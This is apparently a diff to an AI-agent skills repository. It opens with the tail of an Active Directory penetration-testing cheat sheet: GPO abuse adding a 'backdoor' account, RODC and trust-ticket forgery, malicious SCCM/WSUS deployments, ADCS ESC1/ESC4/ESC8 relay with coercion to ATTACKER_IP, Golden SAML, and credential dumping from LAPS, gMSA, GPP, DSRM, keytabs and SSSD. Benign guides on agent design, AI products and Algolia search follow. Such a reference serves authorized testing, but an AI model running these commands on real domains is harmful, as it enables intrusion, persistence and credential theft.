.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"

# Add user rights
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"

# Add an immediate task
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
```

### Abuse with pyGPOAbuse (Linux)

```bash
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
```

---
## RODC Attacks

### RODC Golden Ticket

RODCs hold a filtered copy of AD (excluding secrets such as LAPS and BitLocker keys). Tickets can be forged for principals listed in msDS-RevealOnDemandGroup.

### RODC Key List Attack

**Requirements:**

- krbtgt credentials of the RODC (`-rodcKey`)
- ID of the RODC's krbtgt account (`-rodcNo`)

```bash
# Impacket keylistattack
keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full

# Using secretsdump with keylist
secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
```

**Using Rubeus:**

```powershell
Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
```

---
## SCCM/WSUS Deployment

### SCCM Attack with MalSCCM

```bash
# Locate the SCCM server
MalSCCM.exe locate

# Enumerate targets
MalSCCM.exe inspect /all
MalSCCM.exe inspect /computers

# Create a target group
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC

# Create a malicious app
MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"

# Deploy
MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update

# Force check-in
MalSCCM.exe checkin /groupname:TargetGroup

# Cleanup
MalSCCM.exe app /cleanup /name:backdoor
MalSCCM.exe group /delete /groupname:TargetGroup
```

### SCCM Network Access Accounts

```powershell
# Find the SCCM blob
Get-WmiObject -Namespace "root\ccm\policy\Machine\ActualConfig" -Class "CCM_NetworkAccessAccount"

# Decrypt with SharpSCCM
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
```

### WSUS Deployment Attack

```bash
# Using SharpWSUS
SharpWSUS.exe locate
SharpWSUS.exe inspect

# Create a malicious update
SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"

# Deploy to a target
SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"

# Check status
SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local

# Cleanup
SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
```

---
## AD Certificate Services (ADCS)

### ESC1 - Misconfigured Templates

The template allows ENROLLEE_SUPPLIES_SUBJECT and has a Client Authentication EKU.

```bash
# Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable

# Request a certificate as admin
certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local

# Authenticate
certipy auth -pfx administrator.pfx -dc-ip DC_IP
```

### ESC4 - ACL Vulnerabilities

```bash
# Check for WriteProperty
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl

# Add the ENROLLEE_SUPPLIES_SUBJECT flag
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT

# Perform ESC1, then restore
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
```

### ESC8 - NTLM Relay to Web Enrollment

```bash
# Start the relay
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Coerce authentication
python3 petitpotam.py ATTACKER_IP DC_IP

# Use the certificate
Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
```

### Shadow Credentials

```bash
# Add a Key Credential (pyWhisker)
python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add

# Get a TGT with PKINIT
python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache

# Get the NT hash
export KRB5CCNAME=target.ccache
python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
```

---
## Trust Relationship Attacks

### Child to Parent Domain (SID History)

```powershell
# Get the Enterprise Admins SID from the parent
$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"

# Create a Golden Ticket with SID History
kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
```

### Forest to Forest (Trust Ticket)

```bash
# Dump the trust key
lsadump::trust /patch

# Forge an inter-realm TGT
kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi

# Use the trust ticket
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
```

---
## ADFS Golden SAML

**Requirements:**

- ADFS service account access
- Token-signing certificate (PFX + decryption password)

```bash
# Dump with ADFSDump
.\ADFSDump.exe

# Forge a SAML token
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
```

---
## Credential Sources

### LAPS Password

```powershell
# PowerShell
Get-ADComputer -Filter {ms-mcs-admpwdexpirationtime -like '*'} -Properties 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# CrackMapExec
crackmapexec ldap DC_IP -u user -p password -M laps
```

### GMSA Password

```powershell
# PowerShell + DSInternals
$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
```

```bash
# Linux with bloodyAD
python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
```

### Group Policy Preferences (GPP)

```bash
# Find in SYSVOL
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml

# Decrypt
python3 Get-GPPPassword.py -no-pass 'DC_IP'
```

### DSRM Credentials

```powershell
# Dump the DSRM hash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

# Enable DSRM admin logon
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name DsrmAdminLogonBehavior -Value 2
```

---
## Linux AD Integration

### CCACHE Ticket Reuse

```bash
# Find tickets
ls /tmp/ | grep krb5cc

# Use a ticket
export KRB5CCNAME=/tmp/krb5cc_1000
```

### Extract from Keytab

```bash
# List keys
klist -k /etc/krb5.keytab

# Extract with KeyTabExtract
python3 keytabextract.py /etc/krb5.keytab
```

### Extract from SSSD

```bash
# Database location
/var/lib/sss/secrets/secrets.ldb

# Key location
/var/lib/sss/secrets/.secrets.mkey

# Extract
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
```
55 skills/address-github-comments/SKILL.md Normal file
@@ -0,0 +1,55 @@

---
name: address-github-comments
description: Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.
---

# Address GitHub Comments

## Overview

Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.

## Prerequisites

Ensure `gh` is authenticated.

```bash
gh auth status
```

If not logged in, run `gh auth login`.

## Workflow

### 1. Inspect Comments

Fetch the comments for the current branch's PR.

```bash
gh pr view --comments
```

Or use a custom script, if available, to list threads.

### 2. Categorize and Plan

- List the comments and review threads.
- Propose a fix for each.
- **Wait for user confirmation** on which comments to address first if there are many.

### 3. Apply Fixes

Apply the code changes for the selected comments.

### 4. Respond to Comments

Once fixed, respond to the threads and mark them resolved.

```bash
gh pr comment <PR_NUMBER> --body "Addressed in latest commit."
```

## Common Mistakes

- **Applying fixes without understanding context**: Always read the code surrounding a comment.
- **Not verifying auth**: Check `gh auth status` before starting.
64 skills/agent-evaluation/SKILL.md Normal file
@@ -0,0 +1,64 @@

---
name: agent-evaluation
description: "Testing and benchmarking LLM agents, including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on real-world benchmarks. Use when: agent testing, agent evaluation, benchmark agents, agent reliability, test agent."
source: vibeship-spawner-skills (Apache 2.0)
---

# Agent Evaluation

You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in production. You've learned that evaluating LLM agents is fundamentally different from testing traditional software—the same input can produce different outputs, and "correct" often has no single answer.

You've built evaluation frameworks that catch issues before production: behavioral regression tests, capability assessments, and reliability metrics. You understand that the goal isn't a 100% test pass rate—it's knowing how reliably the agent behaves.

## Capabilities

- agent-testing
- benchmark-design
- capability-assessment
- reliability-metrics
- regression-testing

## Requirements

- testing-fundamentals
- llm-fundamentals

## Patterns

### Statistical Test Evaluation

Run tests multiple times and analyze the distribution of results.
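A minimal sketch of the statistical approach: run a nondeterministic test many times and report a pass rate rather than a single pass/fail bit. The `run_test` callable and the threshold value are illustrative, not part of any specific framework.

```python
import random
from statistics import mean

def evaluate_statistically(run_test, n_runs=20, pass_threshold=0.9):
    """Run a nondeterministic agent test n_runs times and summarize results.

    Returning a pass rate (instead of one pass/fail bit) makes
    flaky-but-mostly-correct behavior visible.
    """
    results = [bool(run_test()) for _ in range(n_runs)]
    pass_rate = mean(results)
    return {
        "runs": n_runs,
        "pass_rate": pass_rate,
        "verdict": "pass" if pass_rate >= pass_threshold else "fail",
    }

# Stand-in for a real agent test: passes roughly 95% of the time.
def flaky_agent_test():
    return random.random() < 0.95

summary = evaluate_statistically(flaky_agent_test, n_runs=200)
```

In practice the threshold and run count depend on how expensive each agent run is and how much flakiness the behavior under test tolerates.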
### Behavioral Contract Testing

Define and test agent behavioral invariants.

### Adversarial Testing

Actively try to break agent behavior.

## Anti-Patterns

### ❌ Single-Run Testing

### ❌ Only Happy Path Tests

### ❌ Output String Matching

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Agent scores well on benchmarks but fails in production | high | Bridge benchmark and production evaluation |
| Same test passes sometimes, fails other times | high | Handle flaky tests in LLM agent evaluation |
| Agent optimized for metric, not actual task | medium | Multi-dimensional evaluation to prevent gaming |
| Test data accidentally used in training or prompts | critical | Prevent data leakage in agent evaluation |

## Related Skills

Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`
40 skills/agent-manager-skill/SKILL.md Normal file
@@ -0,0 +1,40 @@

---
name: agent-manager-skill
description: Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling.
---

# Agent Manager Skill

## When to use

Use this skill when you need to:

- run multiple local CLI agents in parallel (separate tmux sessions)
- start/stop agents and tail their logs
- assign tasks to agents and monitor output
- schedule recurring agent work (cron)

## Prerequisites

Install `agent-manager-skill` in your workspace:

```bash
git clone https://github.com/fractalmind-ai/agent-manager-skill.git
```

## Common commands

```bash
python3 agent-manager/scripts/main.py doctor
python3 agent-manager/scripts/main.py list
python3 agent-manager/scripts/main.py start EMP_0001
python3 agent-manager/scripts/main.py monitor EMP_0001 --follow
python3 agent-manager/scripts/main.py assign EMP_0002 <<'EOF'
Follow teams/fractalmind-ai-maintenance.md Workflow
EOF
```

## Notes

- Requires `tmux` and `python3`.
- Agents are configured under an `agents/` directory (see the repo for examples).
67 skills/agent-memory-systems/SKILL.md Normal file
@@ -0,0 +1,67 @@

---
name: agent-memory-systems
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector stores), and the cognitive architectures that organize them. Key insight: Memory isn't just storage - it's retrieval. A million stored facts mean nothing if you can't find the right one. Chunking, embedding, and retrieval strategies determine whether your agent remembers or forgets. The field is fragmented."
source: vibeship-spawner-skills (Apache 2.0)
---

# Agent Memory Systems

You are a cognitive architect who understands that memory makes agents intelligent. You've built memory systems for agents handling millions of interactions. You know that the hard part isn't storing - it's retrieving the right memory at the right time.

Your core insight: Memory failures look like intelligence failures. When an agent "forgets" or gives inconsistent answers, it's almost always a retrieval problem, not a storage problem. You obsess over chunking strategies, embedding quality, and retrieval tuning.

## Capabilities

- agent-memory
- long-term-memory
- short-term-memory
- working-memory
- episodic-memory
- semantic-memory
- procedural-memory
- memory-retrieval
- memory-formation
- memory-decay

## Patterns

### Memory Type Architecture

Choosing the right memory type for different information.

### Vector Store Selection Pattern

Choosing the right vector database for your use case.

### Chunking Strategy Pattern

Breaking documents into retrievable chunks.
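A minimal sketch of a chunking strategy: fixed-size chunks with overlap, so a sentence straddling a boundary stays retrievable from at least one chunk. Sizes here are characters for simplicity; real systems usually count tokens, and the numbers are illustrative.

```python
def chunk_text(text, chunk_size=200, overlap=50):
    """Split text into overlapping chunks for embedding and retrieval."""
    if overlap >= chunk_size:
        raise ValueError("overlap must be smaller than chunk_size")
    chunks = []
    step = chunk_size - overlap
    for start in range(0, len(text), step):
        chunk = text[start:start + chunk_size]
        if chunk:
            chunks.append(chunk)
        # Stop once the current chunk reaches the end of the text.
        if start + chunk_size >= len(text):
            break
    return chunks

chunks = chunk_text("word " * 200, chunk_size=100, overlap=20)
```

As the anti-patterns below suggest, any chunking choice should be validated by measuring retrieval quality, not assumed.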
## Anti-Patterns

### ❌ Store Everything Forever

### ❌ Chunk Without Testing Retrieval

### ❌ Single Memory Type for All Data

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | Contextual chunking (Anthropic's approach) |
| Issue | high | Test different chunk sizes |
| Issue | high | Always filter by metadata first |
| Issue | high | Add temporal scoring |
| Issue | medium | Detect conflicts on storage |
| Issue | medium | Budget tokens for different memory types |
| Issue | medium | Track the embedding model in metadata |

## Related Skills

Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`
53 skills/agent-tool-builder/SKILL.md Normal file
@@ -0,0 +1,53 @@

---
name: agent-tool-builder
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessary. This skill covers tool design from schema to error handling: JSON Schema best practices, description writing that actually helps the LLM, validation, and the emerging MCP standard that's becoming the lingua franca for AI tools. Key insight: Tool descriptions are more important than tool implementations."
source: vibeship-spawner-skills (Apache 2.0)
---

# Agent Tool Builder

You are an expert in the interface between LLMs and the outside world. You've seen tools that work beautifully and tools that cause agents to hallucinate, loop, or fail silently. The difference is almost always in the design, not the implementation.

Your core insight: The LLM never sees your code. It only sees the schema and description. A perfectly implemented tool with a vague description will fail. A simple tool with crystal-clear documentation will succeed.

You push for explicit error handling.

## Capabilities

- agent-tools
- function-calling
- tool-schema-design
- mcp-tools
- tool-validation
- tool-error-handling

## Patterns

### Tool Schema Design

Creating clear, unambiguous JSON Schema for tools.
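A sketch of what such a schema can look like, with a tiny stdlib-only argument check. The tool name, fields, and constraints are all illustrative; a real system would validate with a proper JSON Schema library.

```python
# Hypothetical tool definition: every field has a type, constraints, and a
# description that tells the LLM when to use (and not use) the tool.
search_orders_tool = {
    "name": "search_orders",
    "description": (
        "Search customer orders by status and date range. "
        "Returns at most `limit` orders, newest first. "
        "Use this when the user asks about order history; "
        "do NOT use it to modify orders."
    ),
    "parameters": {
        "type": "object",
        "properties": {
            "status": {
                "type": "string",
                "enum": ["pending", "shipped", "delivered", "cancelled"],
                "description": "Order status to filter by.",
            },
            "since": {
                "type": "string",
                "description": "ISO 8601 date, e.g. '2024-01-31'. Inclusive lower bound.",
            },
            "limit": {
                "type": "integer",
                "minimum": 1,
                "maximum": 50,
                "description": "Maximum number of orders to return.",
            },
        },
        "required": ["status"],
    },
}

def validate_args(schema, args):
    """Tiny check: required keys present, no unknown keys."""
    props = schema["parameters"]["properties"]
    missing = [k for k in schema["parameters"]["required"] if k not in args]
    unknown = [k for k in args if k not in props]
    return {"ok": not missing and not unknown, "missing": missing, "unknown": unknown}
```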
### Tool with Input Examples

Using examples to guide LLM tool usage.

### Tool Error Handling

Returning errors that help the LLM recover.

## Anti-Patterns

### ❌ Vague Descriptions

### ❌ Silent Failures

### ❌ Too Many Tools

## Related Skills

Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`
90 skills/ai-agents-architect/SKILL.md Normal file
@@ -0,0 +1,90 @@

---
name: ai-agents-architect
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool use, function calling."
source: vibeship-spawner-skills (Apache 2.0)
---

# AI Agents Architect

**Role**: AI Agent Systems Architect

I build AI systems that can act autonomously while remaining controllable. I understand that agents fail in unexpected ways - I design for graceful degradation and clear failure modes. I balance autonomy with oversight, knowing when an agent should ask for help vs proceed independently.

## Capabilities

- Agent architecture design
- Tool and function calling
- Agent memory systems
- Planning and reasoning strategies
- Multi-agent orchestration
- Agent evaluation and debugging

## Requirements

- LLM API usage
- Understanding of function calling
- Basic prompt engineering

## Patterns

### ReAct Loop

Reason-Act-Observe cycle for step-by-step execution

```javascript
- Thought: reason about what to do next
- Action: select and invoke a tool
- Observation: process tool result
- Repeat until task complete or stuck
- Include max iteration limits
```
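The steps above can be sketched as a loop with a hard iteration cap. `call_llm`, the step format, and the tool registry are stand-ins for a real LLM client, not any particular framework's API.

```python
def react_loop(task, call_llm, tools, max_iters=5):
    """Minimal ReAct sketch: Thought -> Action -> Observation, with a cap."""
    history = [f"Task: {task}"]
    for _ in range(max_iters):
        step = call_llm(history)  # assumed to return {"thought", "action", "input"}
        history.append(f"Thought: {step['thought']}")
        if step["action"] == "finish":
            return {"status": "done", "answer": step["input"], "history": history}
        tool = tools.get(step["action"])
        if tool is None:
            observation = f"Error: unknown tool '{step['action']}'"  # surface errors
        else:
            observation = tool(step["input"])  # Act
        history.append(f"Observation: {observation}")  # Observe
    return {"status": "max_iters_reached", "history": history}

# Scripted fake LLM for illustration: looks up a fact, then finishes.
def fake_llm(history):
    if not any(h.startswith("Observation") for h in history):
        return {"thought": "Need the capital", "action": "lookup", "input": "France"}
    return {"thought": "I have the answer", "action": "finish", "input": "Paris"}

tools = {"lookup": lambda q: {"France": "Paris"}.get(q, "not found")}
result = react_loop("Capital of France?", fake_llm, tools)
```

The iteration cap is the load-bearing part: without it, a confused model loops forever (see the sharp edges below).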
### Plan-and-Execute

Plan first, then execute steps

```javascript
- Planning phase: decompose task into steps
- Execution phase: execute each step
- Replanning: adjust plan based on results
- Separate planner and executor models possible
```

### Tool Registry

Dynamic tool discovery and management

```javascript
- Register tools with schema and examples
- Tool selector picks relevant tools for task
- Lazy loading for expensive tools
- Usage tracking for optimization
```
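A minimal sketch of such a registry, assuming tag-based selection and simple call counting; the class and method names are illustrative.

```python
class ToolRegistry:
    def __init__(self):
        self._tools = {}

    def register(self, name, fn, description, tags=()):
        self._tools[name] = {"fn": fn, "description": description,
                             "tags": set(tags), "calls": 0}

    def select(self, task_tags):
        """Return only tools relevant to the task, avoiding tool overload."""
        wanted = set(task_tags)
        return [n for n, t in self._tools.items() if t["tags"] & wanted]

    def invoke(self, name, *args, **kwargs):
        tool = self._tools[name]
        tool["calls"] += 1  # usage tracking for later curation
        return tool["fn"](*args, **kwargs)

registry = ToolRegistry()
registry.register("add", lambda a, b: a + b, "Add two numbers", tags=["math"])
registry.register("upper", str.upper, "Uppercase a string", tags=["text"])
selected = registry.select(["math"])
```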
## Anti-Patterns

### ❌ Unlimited Autonomy

### ❌ Tool Overload

### ❌ Memory Hoarding

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Agent loops without iteration limits | critical | Always set iteration limits |
| Vague or incomplete tool descriptions | high | Write complete tool specs |
| Tool errors not surfaced to agent | high | Handle errors explicitly |
| Storing everything in agent memory | medium | Use selective memory |
| Agent has too many tools | medium | Curate tools per task |
| Using multiple agents when one would work | medium | Justify multi-agent designs |
| Agent internals not logged or traceable | medium | Implement tracing |
| Fragile parsing of agent outputs | medium | Handle outputs robustly |

## Related Skills

Works well with: `rag-engineer`, `prompt-engineer`, `backend`, `mcp-builder`
54
skills/ai-product/SKILL.md
Normal file
54
skills/ai-product/SKILL.md
Normal file
@@ -0,0 +1,54 @@
|
||||
---
name: ai-product
description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt engineering that scales, AI UX that users trust, and cost optimization that doesn't bankrupt you. Use when: keywords, file_patterns, code_patterns."
source: vibeship-spawner-skills (Apache 2.0)
---

# AI Product Development

You are an AI product engineer who has shipped LLM features to millions of
users. You've debugged hallucinations at 3am, optimized prompts to reduce
costs by 80%, and built safety systems that caught thousands of harmful
outputs. You know that demos are easy and production is hard. You treat
prompts as code, validate all outputs, and never trust an LLM blindly.

## Patterns

### Structured Output with Validation

Use function calling or JSON mode with schema validation

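A minimal stdlib-only sketch of the pattern: parse the model's JSON and enforce a schema before anything downstream touches it. The field names here are assumptions for illustration; in practice you would use function calling or a schema library rather than a hand-rolled check.

```python
import json

# Assumed schema for illustration only.
REQUIRED = {"title": str, "summary": str, "tags": list}

def validate_output(text):
    """Parse model output and enforce a schema before using it."""
    data = json.loads(text)  # raises ValueError on non-JSON output
    for field, typ in REQUIRED.items():
        if field not in data:
            raise ValueError(f"missing field: {field}")
        if not isinstance(data[field], typ):
            raise ValueError(f"bad type for {field}")
    return data
```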
### Streaming with Progress

Stream LLM responses to show progress and reduce perceived latency

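The idea can be sketched with a generator standing in for a streaming API. `fake_stream` is an illustrative stub, not a real client call: a real implementation would iterate over the provider's streaming response instead.

```python
def fake_stream(prompt):
    # Stand-in for a streaming LLM API: yields tokens as they arrive.
    for token in ["Stream", "ing ", "reduces ", "perceived ", "latency."]:
        yield token

def stream_to_user(prompt, on_chunk):
    """Render chunks as they arrive instead of waiting for the full reply."""
    parts = []
    for chunk in fake_stream(prompt):
        on_chunk(chunk)          # e.g. append to the UI immediately
        parts.append(chunk)
    return "".join(parts)        # full text kept for logging/validation
```

The key design point: the UI callback fires per chunk, while the joined text is still available at the end for validation and logging.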
### Prompt Versioning and Testing

Version prompts in code and test with regression suite

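A tiny sketch of prompts-as-versioned-code with a regression check. The template names and test cases are assumptions for illustration; the point is that each prompt version lives in source control and a suite pins the properties it must keep.

```python
# Prompts versioned in code (illustrative names and cases).
PROMPTS = {
    "summarize/v1": "Summarize the following text:\n{text}",
    "summarize/v2": "Summarize in one sentence, no preamble:\n{text}",
}

def render(name, **kwargs):
    return PROMPTS[name].format(**kwargs)

def regression_suite():
    # Each case pins a property a prompt version must keep.
    cases = [
        ("summarize/v2", {"text": "abc"}, "one sentence"),
    ]
    for name, args, must_contain in cases:
        assert must_contain in render(name, **args), name
    return True
```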
## Anti-Patterns

### ❌ Demo-ware

**Why bad**: Demos deceive. Production reveals truth. Users lose trust fast.

### ❌ Context window stuffing

**Why bad**: Expensive, slow, hits limits. Dilutes relevant context with noise.

### ❌ Unstructured output parsing

**Why bad**: Breaks randomly. Inconsistent formats. Injection risks.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Trusting LLM output without validation | critical | Always validate output |
| User input directly in prompts without sanitization | critical | Defense layers |
| Stuffing too much into context window | high | Calculate tokens before sending |
| Waiting for complete response before showing anything | high | Stream responses |
| Not monitoring LLM API costs | high | Track per-request |
| App breaks when LLM API fails | high | Defense in depth |
| Not validating facts from LLM responses | critical | Verify factual claims |
| Making LLM calls in synchronous request handlers | high | Async patterns |
273
skills/ai-wrapper-product/SKILL.md
Normal file
@@ -0,0 +1,273 @@
---
name: ai-wrapper-product
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Covers prompt engineering for products, cost management, rate limiting, and building defensible AI businesses. Use when: AI wrapper, GPT product, AI tool, wrap AI, AI SaaS."
source: vibeship-spawner-skills (Apache 2.0)
---

# AI Wrapper Product

**Role**: AI Product Architect

You know AI wrappers get a bad rap, but the good ones solve real problems.
You build products where AI is the engine, not the gimmick. You understand
that prompt engineering is product development. You balance costs with user
experience. You create AI products people actually pay for and use daily.

## Capabilities

- AI product architecture
- Prompt engineering for products
- API cost management
- AI usage metering
- Model selection
- AI UX patterns
- Output quality control
- AI product differentiation

## Patterns

### AI Product Architecture

Building products around AI APIs

**When to use**: When designing an AI-powered product

#### The Wrapper Stack

```
User Input
  ↓
Input Validation + Sanitization
  ↓
Prompt Template + Context
  ↓
AI API (OpenAI/Anthropic/etc.)
  ↓
Output Parsing + Validation
  ↓
User-Friendly Response
```

#### Basic Implementation

```javascript
import Anthropic from '@anthropic-ai/sdk';

const anthropic = new Anthropic();

async function generateContent(userInput, context) {
  // 1. Validate input
  if (!userInput || userInput.length > 5000) {
    throw new Error('Invalid input');
  }

  // 2. Build prompt
  const systemPrompt = `You are a ${context.role}.
Always respond in ${context.format}.
Tone: ${context.tone}`;

  // 3. Call API
  const response = await anthropic.messages.create({
    model: 'claude-3-haiku-20240307',
    max_tokens: 1000,
    system: systemPrompt,
    messages: [{
      role: 'user',
      content: userInput
    }]
  });

  // 4. Parse and validate output
  const output = response.content[0].text;
  return parseOutput(output);
}
```

#### Model Selection

| Model | Cost | Speed | Quality | Use Case |
|-------|------|-------|---------|----------|
| GPT-4o | $$$ | Fast | Best | Complex tasks |
| GPT-4o-mini | $ | Fastest | Good | Most tasks |
| Claude 3.5 Sonnet | $$ | Fast | Excellent | Balanced |
| Claude 3 Haiku | $ | Fastest | Good | High volume |

### Prompt Engineering for Products

Production-grade prompt design

**When to use**: When building AI product prompts

#### Prompt Template Pattern

```javascript
const promptTemplates = {
  emailWriter: {
    system: `You are an expert email writer.
Write professional, concise emails.
Match the requested tone.
Never include placeholder text.`,
    user: (input) => `Write an email:
Purpose: ${input.purpose}
Recipient: ${input.recipient}
Tone: ${input.tone}
Key points: ${input.points.join(', ')}
Length: ${input.length} sentences`,
  },
};
```

#### Output Control

```javascript
// Force structured output
const systemPrompt = `
Always respond with valid JSON in this format:
{
  "title": "string",
  "content": "string",
  "suggestions": ["string"]
}
Never include any text outside the JSON.
`;

// Parse with fallback
function parseAIOutput(text) {
  try {
    return JSON.parse(text);
  } catch {
    // Fallback: extract JSON from response
    const match = text.match(/\{[\s\S]*\}/);
    if (match) return JSON.parse(match[0]);
    throw new Error('Invalid AI output');
  }
}
```

#### Quality Control

| Technique | Purpose |
|-----------|---------|
| Examples in prompt | Guide output style |
| Output format spec | Consistent structure |
| Validation | Catch malformed responses |
| Retry logic | Handle failures |
| Fallback models | Reliability |

### Cost Management

Controlling AI API costs

**When to use**: When building profitable AI products

#### Token Economics

```javascript
// Track usage
async function callWithCostTracking(userId, prompt) {
  const response = await anthropic.messages.create({...});

  // Log usage
  await db.usage.create({
    userId,
    inputTokens: response.usage.input_tokens,
    outputTokens: response.usage.output_tokens,
    cost: calculateCost(response.usage),
    model: 'claude-3-haiku',
  });

  return response;
}

function calculateCost(usage) {
  const rates = {
    'claude-3-haiku': { input: 0.25, output: 1.25 }, // per 1M tokens
  };
  const rate = rates['claude-3-haiku'];
  return (usage.input_tokens * rate.input +
          usage.output_tokens * rate.output) / 1_000_000;
}
```

#### Cost Reduction Strategies

| Strategy | Savings |
|----------|---------|
| Use cheaper models | 10-50x |
| Limit output tokens | Variable |
| Cache common queries | High |
| Batch similar requests | Medium |
| Truncate input | Variable |

#### Usage Limits

```javascript
async function checkUsageLimits(userId) {
  const usage = await db.usage.sum({
    where: {
      userId,
      createdAt: { gte: startOfMonth() }
    }
  });

  const limits = await getUserLimits(userId);
  if (usage.cost >= limits.monthlyCost) {
    throw new Error('Monthly limit reached');
  }
  return true;
}
```

## Anti-Patterns

### ❌ Thin Wrapper Syndrome

**Why bad**: No differentiation. Users just use ChatGPT. No pricing power. Easy to replicate.

**Instead**: Add domain expertise. Perfect the UX for a specific task. Integrate into workflows. Post-process outputs.

### ❌ Ignoring Costs Until Scale

**Why bad**: Surprise bills. Negative unit economics. Can't price properly. Business isn't viable.

**Instead**: Track every API call. Know your cost per user. Set usage limits. Price with margin.

### ❌ No Output Validation

**Why bad**: AI hallucinates. Inconsistent formatting. Bad user experience. Trust issues.

**Instead**: Validate all outputs. Parse structured responses. Have fallback handling. Post-process for consistency.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| AI API costs spiral out of control | high | Controlling AI costs |
| App breaks when hitting API rate limits | high | Handling rate limits |
| AI gives wrong or made-up information | high | Handling hallucinations |
| AI responses too slow for good UX | medium | Improving AI latency |

## Related Skills

Works well with: `llm-architect`, `micro-saas-launcher`, `frontend`, `backend`

66
skills/algolia-search/SKILL.md
Normal file
@@ -0,0 +1,66 @@
---
name: algolia-search
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning. Use when: adding search to, algolia, instantsearch, search api, search functionality."
source: vibeship-spawner-skills (Apache 2.0)
---

# Algolia Search Integration

## Patterns

### React InstantSearch with Hooks

Modern React InstantSearch setup using hooks for type-ahead search.

Uses the react-instantsearch-hooks-web package with the algoliasearch client.
Widgets are components that can be customized with classnames.

Key hooks:

- useSearchBox: Search input handling
- useHits: Access search results
- useRefinementList: Facet filtering
- usePagination: Result pagination
- useInstantSearch: Full state access

